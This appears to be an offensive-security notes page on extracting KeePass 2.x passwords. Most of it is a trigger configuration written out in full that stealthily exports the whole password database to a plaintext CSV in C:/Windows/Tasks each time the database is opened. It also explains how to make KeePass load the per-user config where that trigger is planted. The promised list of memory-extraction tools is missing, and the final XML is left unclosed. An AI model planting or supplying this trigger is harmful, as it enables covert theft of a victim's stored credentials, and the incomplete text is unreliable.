KeePass

For KeePass 2.x it is possible to extract passwords from memory using either of the following tools:

Furthermore, if the following is noted in C:\Program Files (x86)\KeePass Password Safe 2\KeePass.config.xml

<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        <Meta>
                <PreferUserConfiguration>true</PreferUserConfiguration>
        </Meta>
</Configuration>

This means that the local config will be used, stored in C:\Users\USERNAME\AppData\Roaming\KeePass\KeePass.config.xml

It is possible to add trigger to stealthily extract the DB content when opened:

<?xml version="1.0" encoding="utf-8"?>
<Configuration xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <TriggerSystem>
      <Triggers>
        <Trigger>
          <Guid>6KWCIs4ii0u15lY+Ps59Cg==</Guid>
          <Name>Debug</Name>
          <Events>
            <Event>
              <TypeGuid>5f8TBoW4QYm5BvaeKztApw==</TypeGuid>
              <Parameters>
                <Parameter>0</Parameter>
                <Parameter />
              </Parameters>
            </Event>
          </Events>
          <Conditions />
          <Actions>
            <Action>
              <TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
              <Parameters>
                <Parameter>C:/Windows/Tasks\{DB_BASENAME}.csv</Parameter>
                <Parameter>KeePass CSV (1.x)</Parameter>
                <Parameter />
                <Parameter />
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>

Last updated 1 year ago